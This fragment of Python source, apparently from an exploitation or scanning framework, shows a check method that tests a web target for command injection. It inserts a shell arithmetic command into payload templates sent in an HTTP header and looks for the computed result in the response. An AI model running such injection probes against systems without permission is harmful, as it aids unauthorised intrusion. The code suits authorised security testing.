| 69 | |
| 70 | @mute |
| 71 | def check(self): |
| 72 | number = int(utils.random_text(6, alph=string.digits)) |
| 73 | solution = number - 1 |
| 74 | cmd = "echo $(({}-1))".format(number) |
| 75 | |
| 76 | marker = utils.random_text(32) |
| 77 | for payload in self.payloads: |
| 78 | injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd) |
| 79 | |
| 80 | headers = { |
| 81 | self.header: injection, |
| 82 | } |
| 83 | |
| 84 | response = self.http_request( |
| 85 | method=self.method, |
| 86 | path=self.path, |
| 87 | headers=headers |
| 88 | ) |
| 89 | if response is None: |
| 90 | continue |
| 91 | |
| 92 | if str(solution) in response.text: |
| 93 | self.valid = payload |
| 94 | return True # target is vulnerable |
| 95 | |
| 96 | return False # target not vulnerable |